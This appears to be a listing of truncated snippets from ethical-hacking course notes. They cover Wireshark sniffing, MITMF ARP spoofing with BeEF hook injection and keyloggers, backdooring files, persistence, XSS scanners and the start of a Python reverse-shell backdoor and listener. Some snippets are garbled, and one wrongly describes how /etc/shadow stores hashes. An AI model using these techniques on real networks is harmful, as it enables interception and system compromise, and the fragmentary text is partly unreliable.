Wireshark for Ethical Hackers - 4 An Alfa adapter that supports wireless G/N is required.
Parameter: Value
Chipset: Realtek RTL8814AU
WiFi Standards: IEEE 802.11ac/a/b/g/n
WiFi Frequency: Dual Band 2.4GHz or 5GHz
Antenna Connector: RP-SMA female x 4
Wireshark for Ethical Hackers - 2 Interface Overview Start Wireshark in Kali Linux. HTTP Image Extracting filter: image-jfif Show packet bytes / Export packet bytes HTTP Passwords Target website: http://uploaded.net/login filter: HTTP filter: urlencod
Linux doesn't store plaintext passwords. Instead, it stores an HMAC-SHA256 hash of the passwords in the file /etc/shadow. The permissions on the /etc/shadow file indicate that only the owner (root) and the group (shadow) can read the file, and that on
Coraline Ada Ehmke, creator of the Hippocratic License (an open-source license with an ethics clause added) and of the first and most popular open-source project code of conduct, the Contributor Covenant, has announced the founding of a new non-profit open-source organization, the Organization for Ethical Source (OES), to
MAINTAINING ACCESS - Methods 1. Using veil-evasion's Rev_http_service / Rev_tcp_service payloads instead of a normal backdoor, or upload and execute from meterpreter. Does not always work. 2. Using the persistence module: run persistence -h. Detectable by antivi
CLIENT SIDE ATTACK - BeEF Framework Hooking targets using MITMF Tools: MITMF and BeEF Start BeEF and execute the following commands: python2 mitmf.py --arp --spoof --gateway 10.0.0.1 --targets 10.0.0.22 -i eth0 --inject --js-url http://10.0.0.13:3000/hoo
CLIENT SIDE ATTACKS Backdooring ANY file Combine a backdoor with any file - a generic solution. Users are more likely to run a pdf, image or audio file than an executable. Works well with social engineering. To convert the original (pdf, jpg, mp3) file to an
Server Side Attack Analysing scan results and exploiting the target system. Go to the Analysis page and find the target host. Scan result - services: Scan result - vulnerabilities: Scan result - credentials: Try to log in to the database using
Server side attacks - code execution Let's analyze the Zenmap scan result first and search for vulnerabilities in Samba smbd 3.x. We find the following vulnerability and try to use it. https://www.rapid7.com/db/modules/exploit/multi/samba/
Detecting ARP Poisoning Attacks ARP's main security issues: 1. Each ARP request/response is trusted. 2. Clients accept responses even if they did not send a request. We can use the tool called XArp (http://www.xarp.net/) to detect this kind of attack.
MITM - Code Injection Inject JavaScript or HTML code into pages. The code gets executed on the target machine. Use the --inject plugin. The code can be: 1. Stored in a local file: --js-file or --html-file 2. Stored online: --js-url or --html-url 3. Or you can supply th
MITM - Capturing Screen Of Target & Injecting a Keylogger ScreenShotter Plugin: ScreenShotter: Uses HTML5 Canvas to render an accurate screenshot of a client's browser --screen Load plugin 'ScreenShotter' --interval SECONDS
Securing your Network From the Above Attacks. Now that we know how to test the security of all known wireless encryption schemes (WEP/WPA/WPA2), it is relatively easy to secure our networks against these attacks, as we know all the weaknesses that can be used by ha
Targeted packet sniffing airodump-ng --channel [channel] --bssid [bssid] --write [file-name] [interface] Now all the data will be stored in the file name specified after the --write option. We can analyze this data using Wireshark. The only problem is that t
Implementing Code To Discover XSS in Parameters 1. Watch the URL of the XSS reflected page carefully. 2. Add the test_xss_in_link method in the Scanner class.
#!/usr/bin/env python
import requests
import re
from bs4 import BeautifulSoup
from urllib.p
VULNERABILITY_SCANNER How to discover a vulnerability in a web application? 1. Go into every possible page. 2. Look for ways to send data to the web application(URL + Forms). 3. Send payloads to discover vulnerabilities. 4. Analyze the response to check o
EXPLOITATION - XSS VULNS XSS - CROSS SITE SCRIPTING VULNS Allow an attacker to inject javascript code into the page. The code is executed when the page loads. The code is executed on the client machine, not the server. Three main types: 1. Persistent/St
Polish the Python code by sending requests in a session in the Scanner class.
#!/usr/bin/env python
import requests
import re
from urllib.parse import urljoin

class Scanner:
    def __init__(self, url, ignore_links):
        self.session = requests.Session()
CRAWLING SPIDER Goal -> Recursively list all links starting from a base URL. 1. Read the page HTML. 2. Extract all links. 3. Repeat for each new link that is not already on the list.
#!/usr/bin/env python
import re
import requests
from urllib.parse import url
Convert Python Programs to OS X Executables https://files.pythonhosted.org/packages/4a/08/6ca123073af4ebc4c5488a5bc8a010ac57aa39ce4d3c8a931ad504de4185/pip-19.3-py2.py3-none-any.whl
Adding Icons to Generated Executables Prepare a proper icon file. https://www.iconfinder.com/ Convert the downloaded png file to an icon file. https://www.easyicon.net/language.en/covert/ Convert the Python program to Windows executable -
Polish the Python code by adding the become_persistent function.
#!/usr/bin/env python
import json
import socket
import subprocess
import os
import base64
import sys
import shutil

class Backdoor:
    def __init__(self, ip, port):
        self.become_persistent()
Handling Errors: If the client or server crashes, the connection will be lost. The backdoor crashes if: an incorrect command is sent, or a correct command is misused. Listener:
#!/usr/bin/env python
import socket
import json
import base64

class Listener:
File Download: A file is a series of characters. Therefore to transfer a file we need to: 1. Read the file as a sequence of characters. 2. Send this sequence of characters. 3. Create a new empty file at the destination. 4. Store the transferred sequence